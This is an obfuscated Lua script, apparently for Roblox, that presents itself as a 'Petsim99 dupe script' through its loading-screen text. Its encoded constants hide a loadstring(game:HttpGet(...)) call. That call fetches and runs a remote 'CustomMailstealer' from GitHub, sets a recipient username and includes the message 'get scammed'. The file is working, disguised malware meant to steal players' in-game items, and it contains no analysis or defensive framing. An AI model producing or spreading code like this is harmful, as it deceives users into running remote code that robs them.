--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v88=v5(v79,v19);v19=nil;return v88;else return v79;end end end);local function v20(v31,v32,v33)if v33 then local v80=(v31/((5 -(1 + 2))^(v32-(2 -1))))%(2^(((v33-((1 + 0) -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v80-(v80%((1809 -(282 + 595)) -((2494 -(1523 + 114)) + 74))) ;else local v81=(570 -(367 + 201))^(v32-1) ;return (((v31%(v81 + v81))>=v81) and 1) or (927 -(214 + 641 + 72)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1271 -(226 + 1044))) then return (v41 * ((41193169 -24414996) -(892 + 65))) + (v40 * (285370 -219834)) + (v39 * ((348 + 124) -216)) + v38 ;end if (v37==(117 -(32 + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (184 -(67 + 113)) ;v37=1 + 0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,1,972 -(802 + 150) ) * ((5 -3)^(57 -25))) + v42 ;local v46=v20(v43,(446 -(44 + 386)) + 5 ,31);local v47=((v20(v43,32)==(998 -(915 + (1568 -(998 + 488))))) and  -(2 -1)) or (1 + 0) ;if (v46==(0 -(0 -0))) then if (v45==(1187 -(1069 + 118))) then return v47 * (0 -(0 + 0)) ;else local v89=0 -0 ;while true do if (v89==(0 + 0)) then v46=(1 + 0) -0 ;v44=(772 -(201 + 571)) + 0 ;break;end end end elseif (v46==(2838 -(368 + 423))) then return ((v45==((1138 -(116 + 1022)) -0)) and (v47 * ((19 -(10 + (33 -25)))/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + (464 -(145 + 293)))) ) * (v44 + (v45/((6 -4)^((83 -60) + (102 -73))))) ;end local function v25(v48)local v49=859 -(814 + 45) ;local v50;local v51;while true do if (v49==(7 -4)) then return v6(v51);end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=1 + 0 ;end if (v49==((3005 -2118) -(261 + 624))) then v51={};for v90=1 -0 , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=3;end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(1081 -(1020 + 60)) );v18=v18 + v48 ;v49=(6747 -5322) -(630 + 313 + 480) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52~=0) then else local v84=0;while true do if (v84~=(3 -1)) then else v52=1 -0 ;break;end if (v84==0) then v53={};v54={};v84=2 -1 ;end if (v84~=(1 + 0)) then else local v98=0;while true do if (1~=v98) then else v84=2 + 0 ;break;end if (v98==0) then v55={};v56={v53,v54,nil,v55};v98=1;end end end end end if ((3 -2)==v52) then local v85=0;local v86;while true do if (v85~=(867 -(550 + 317))) then else v86=0;while true do if (v86==(1 -0)) then for v106=1 -0 ,v57 do local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==2) then while true do if (v108~=(0 -0)) then else local v165=285 -(134 + 151) ;local v166;while true do if (v165~=(1665 -(970 + 695))) then else v166=0 -0 ;while true do if (v166~=(1990 -(582 + 1408))) then else v109=0;v110=nil;v166=1;end if (v166==(3 -2)) then v108=1;break;end end break;end end end if (v108~=(1 -0)) then else v111=nil;while true do if (v109~=0) then else local v172=0 -0 ;local v173;while true do if (v172==(1824 -(1195 + 629))) then v173=0;while true do if ((0 -0)~=v173) then else v110=v21();v111=nil;v173=1;end if (v173~=(242 -(187 + 54))) then else v109=781 -(162 + 618) ;break;end end break;end end end if (v109==(1 + 0)) then if (v110==(1 + 0)) then v111=v21()~=0 ;elseif (v110==2) then v111=v24();elseif (v110==(6 -3)) then v111=v25();end v58[v106]=v111;break;end end break;end end break;end if (v107==(1 -0)) then v110=nil;v111=nil;v107=2;end if (v107~=(0 + 0)) then else v108=1636 -(1373 + 263) ;v109=nil;v107=1001 -(451 + 549) ;end end end v56[1 + 2 ]=v21();v86=2;end if (v86~=(2 -0)) then else v52=2;break;end if (v86==(0 -0)) then v57=v23();v58={};v86=1;end end break;end end end if (v52~=(1386 -(746 + 638))) then else local v87=0;while true do if ((1 + 0)==v87) then return v56;end if (0==v87) then for v99=1 -0 ,v23() do local v100=341 -(218 + 123) ;local v101;local v102;while true do if (v100~=1) then else while true do if (0==v101) then v102=v21();if (v20(v102,1582 -(1535 + 46) ,1 + 0 )==(0 + 0)) then local v155=0;local v156;local v157;local v158;while true do if (v155~=(561 -(306 + 254))) then else local v167=0;local v168;while true do if (v167~=0) then else v168=0 + 0 ;while true do if (v168==1) then v155=3 -1 ;break;end if (v168~=(1467 -(899 + 568))) then else local v178=0 + 0 ;while true do if (v178~=(2 -1)) then else v168=1;break;end if (v178==(603 -(268 + 335))) then v158={v22(),v22(),nil,nil};if (v156==(0 + 0)) then local v183=0;local v184;local v185;while true do if (v183==(1456 -(282 + 1174))) then v184=0;v185=nil;v183=812 -(569 + 242) ;end if (v183==(2 -1)) then while true do if ((0 + 0)~=v184) then else v185=1024 -(706 + 318) ;while true do if (v185~=0) then else v158[3]=v22();v158[4]=v22();break;end end break;end end break;end end elseif (v156==1) then v158[1254 -(721 + 530) ]=v23();elseif (v156==2) then v158[1274 -(945 + 326) ]=v23() -((4 -2)^16) ;elseif (v156~=(3 + 0)) then else local v188=700 -(271 + 429) ;local v189;while true do if (v188==(0 + 0)) then v189=0;while true do if (v189~=0) then else v158[3]=v23() -((1502 -(1408 + 92))^(1102 -(461 + 625))) ;v158[1292 -(993 + 295) ]=v22();break;end end break;end end end v178=1 + 0 ;end end end end break;end end end if (v155~=3) then else if (v20(v157,1174 -(418 + 753) ,2 + 1 )~=1) then else v158[1 + 3 ]=v58[v158[2 + 2 ]];end v53[v99]=v158;break;end if (v155~=(1 + 1)) then else local v170=529 -(406 + 123) ;while true do if ((1769 -(1749 + 20))==v170) then local v177=0 + 0 ;while true do if ((1323 -(1249 + 73))==v177) then v170=1;break;end if (v177~=0) then else if (v20(v157,1,1 + 0 )==1) then v158[2]=v58[v158[2]];end if (v20(v157,1147 -(466 + 679) ,4 -2 )~=(2 -1)) then else v158[3]=v58[v158[3]];end v177=1901 -(106 + 1794) ;end end end if (1==v170) then v155=3;break;end end end if (0==v155) then local v171=0 + 0 ;while true do if (v171==(1 + 0)) then v155=2 -1 ;break;end if (v171~=(0 -0)) then else v156=v20(v102,116 -(4 + 110) ,3);v157=v20(v102,4,6);v171=585 -(57 + 527) ;end end end end end break;end end break;end if (v100==(1427 -(41 + 1386))) then v101=0;v102=nil;v100=1;end end end for v103=104 -(17 + 86) ,v23() do v54[v103-1 ]=v28();end v87=1;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v82=0,v73 do if (v82>=v67) then v71[v82-v67 ]=v72[v82 + 1 ];else v75[v82]=v72[v82 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do local v83=0;while true do if (v83==0) then v77=v65[v69];v78=v77[1];v83=1;end if (v83==1) then if (v78<=4) then if (v78<=1) then if (v78>0) then do return;end else local v112=0;local v113;while true do if (0==v112) then v113=v77[2];v75[v113]=v75[v113](v13(v75,v113 + 1 ,v70));break;end end end elseif (v78<=2) then local v114;local v115,v116;local v117;local v118;v61[v77[3]]=v75[v77[2]];v69=v69 + 1 ;v77=v65[v69];if ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end v69=v69 + 1 ;v77=v65[v69];if ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end v69=v69 + 1 ;v77=v65[v69];v118=v77[2];v117=v75[v77[3]];v75[v118 + 1 ]=v117;v75[v118]=v117[v77[4]];v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]=v77[3];v69=v69 + 1 ;v77=v65[v69];v118=v77[2];v115,v116=v68(v75[v118](v13(v75,v118 + 1 ,v77[3])));v70=(v116 + v118) -1 ;v114=0;for v131=v118,v70 do local v132=0;while true do if (v132==0) then v114=v114 + 1 ;v75[v131]=v115[v114];break;end end end v69=v69 + 1 ;v77=v65[v69];v118=v77[2];v75[v118]=v75[v118](v13(v75,v118 + 1 ,v70));v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]();v69=v69 + 1 ;v77=v65[v69];v69=v77[3];elseif (v78>3) then if ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end else local v139=v77[2];local v140,v141=v68(v75[v139](v13(v75,v139 + 1 ,v77[3])));v70=(v141 + v139) -1 ;local v142=0;for v152=v139,v70 do v142=v142 + 1 ;v75[v152]=v140[v142];end end elseif (v78<=7) then if (v78<=5) then v61[v77[3]]=v75[v77[2]];elseif (v78>6) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else local v143=v77[2];local v144=v75[v77[3]];v75[v143 + 1 ]=v144;v75[v143]=v144[v77[4]];end elseif (v78<=8) then v69=v77[3];elseif (v78>9) then v75[v77[2]]();else v75[v77[2]]=v77[3];end v69=v69 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O73616765030B3O00676574207363612O6D6564030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030A3O00686F64792O31742O656E030F3O00475F4C6F6164696E675363722O656E031C3O0050657473696D2O39206475706520736372697074206C6F6164696E67001E3O0012093O00013O0026073O000D000100020004083O000D0001001209000100043O001202000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001D00010026073O0001000100010004083O00010001001209000100013O00260700010017000100010004083O001700010012090002000A3O001205000200093O0012090002000C3O0012050002000B3O001209000100023O00260700010010000100020004083O001000010012093O00023O0004083O000100010004083O001000010004083O000100012O00013O00017O00",v9(),...);
